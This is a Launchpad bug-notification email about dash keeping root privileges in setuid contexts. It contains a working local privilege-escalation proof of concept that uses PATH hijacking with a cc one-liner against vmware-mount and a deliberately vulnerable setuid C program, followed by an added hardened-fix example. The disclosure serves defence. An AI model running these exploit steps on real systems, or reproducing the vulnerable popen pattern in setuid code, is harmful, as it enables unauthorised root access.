touch-packages team mailing list archive
Message #80729
[Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()
Correction on my previous comment:
My point "1" is only true on Debian and derivatives. bash does drop its
privileges when setuid and called as sh without -p, just like when not
called as sh, but Debian's bash package has a patch that disables that
dropping of privileges when called as sh.
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
** Bug watch added: Debian Bug tracker #52586
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dash in Ubuntu.
https://bugs.launchpad.net/bugs/1215660
Title:
dash does not drop privileges when euid != uid, this can cause local
root exploits when setuid programs use system() or popen()
Status in dash package in Ubuntu:
Triaged
Bug description:
Poorly written setuid programs may call 'popen' or 'system' with
incorrectly specified arguments. For instance, there is a bug in
vmware-mount where it calls "popen('lsb-release')" (CVE-2013-1662). It
should be "popen('/usr/bin/lsb-release')". Because of this, an
attacker can drop a file named 'lsb-release' in . and then call
vmware-mount, and it will happily popen the attacker controlled file
as root.
Now, bash has a 'privdrop' option; however, Debian removed this option in the 1990s:
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff and
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
Most shells will drop privs when euid != uid, because it turns out
calling popen / system from setuid scripts is nearly impossible to get
right (in fact, pretty much any setuid script is insanely difficult to
write without a vulnerability in it).
Ensure /bin/sh is dash
antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root
If we switched to a sane shell (like busybox, for example):
antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("/bin/sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
BusyBox v1.18.5 (Ubuntu 1:1.18.5-1ubuntu4.1) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/usr/local/google/home/antarus $ whoami
whoami: unknown uid XXXXX # I have omitted my actual UID, needless to say it isn't uid 0 :)
Now you may be saying 'hey, I don't have vmware-mount handy', so
instead:
antarus@goats5 ~ $ cat /tmp/silly_setuid.c
#include <stdio.h>
/* Deliberately vulnerable: a relative command name, so the caller's PATH
 * decides what /bin/sh runs here, and it runs with the setuid-root euid. */
int main(void) {
    FILE *p = popen("lsb_release", "r");
    if (p) pclose(p);
    return 0;
}
antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
antarus@goats5 ~ $ sudo chown root:root silly_setuid
[sudo] password for antarus:
antarus@goats5 ~ $ sudo chmod 4755 silly_setuid
antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("whoami>`tty` 2>&1");}';PATH=.:$PATH silly_setuid
antarus@goats5 ~ $ root
Distributor ID: Ubuntu
Description: Ubuntu 12.04.1 LTS
Release: 12.04
Codename: precise
antarus@goats5 ~ $ apt-cache policy dash
dash:
Installed: 0.5.7-2ubuntu2
Candidate: 0.5.7-2ubuntu2
Version table:
*** 0.5.7-2ubuntu2 0
600 my-apt-mirror ubuntu-precise/main amd64 Packages
100 /var/lib/dpkg/status
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dash/+bug/1215660/+subscriptions
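The pattern the report describes, written out as an added example (this is not the reporter's code and not code from the dash, bash or vmware packages): the popen() call with a relative name, placed beside a hardened launch that permanently drops to the real uid/gid and avoids the shell entirely, so the result no longer depends on whether /bin/sh is dash, bash or busybox. The helper path /bin/sh, the fixed PATH value and the function names drop_privileges/run_helper are assumptions made for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern from the report: popen() hands a relative command
 * name to "/bin/sh -c", which resolves it through the caller's PATH and
 * runs it with the caller's euid. With dash as /bin/sh, euid stays 0 all
 * the way into the attacker-controlled file. (Not executed by the demo
 * below or by the test; kept only to show the shape of the bug.) */
int vulnerable_run(void) {
    FILE *p = popen("lsb_release", "r");
    if (p == NULL) return -1;
    return pclose(p);
}

/* Hardened step 1: drop to the real uid/gid. gid first, because once the
 * uid is unprivileged setgid() can no longer change it. Called from a
 * setuid-root process, setuid()/setgid() replace real, effective and saved
 * ids (for a binary setuid to a non-root user, setresuid() is the safer
 * call). Returns 0 on success, -1 otherwise; in an ordinary, non-setuid
 * process this is a successful no-op. */
int drop_privileges(void) {
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;
    /* Verify the drop took effect rather than trusting the return codes. */
    if (geteuid() != uid || getegid() != gid) return -1;
    return 0;
}

/* Hardened step 2: no shell at all. Require an absolute path, supply a
 * fixed environment (so PATH, IFS and friends cannot come from the caller)
 * and drop privileges in the child before exec. Returns the child's exit
 * status, or -1 for a relative/NULL path, fork/wait failure or abnormal
 * termination. An exec failure surfaces as status 127, like a shell would. */
int run_helper(const char *abs_path, char *const argv[]) {
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };  /* assumed value */
    if (abs_path == NULL || abs_path[0] != '/') return -1;   /* "lsb_release" is rejected here */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privileges() != 0) _exit(127);
        execve(abs_path, argv, clean_env);
        _exit(127);   /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Relative name: rejected before anything is executed. */
    char *const bad[] = { "lsb_release", NULL };
    printf("relative path -> %d\n", run_helper("lsb_release", bad));

    /* Absolute path with a clean environment: the helper reports the ids it
     * actually runs with. In a setuid-root build euid equals the real uid
     * here, whichever shell /bin/sh happens to be. */
    char *const ok[] = { "sh", "-c", "echo euid=$(id -u) ruid=$(id -ru)", NULL };
    printf("helper exit status -> %d\n", run_helper("/bin/sh", ok));
    return 0;
}
```

Build with `cc -Wall` and run it normally first; to see the point of the report, install the binary setuid root (as the description does with silly_setuid) and compare: popen() with a relative name executes whatever PATH finds as root under dash, while run_helper() never consults the caller's PATH and has already given up euid 0 before the child execs. Dropping privileges before popen() would also close the hole on dash, but only if every such call site remembers to do it; removing the shell from the path is the more robust fix.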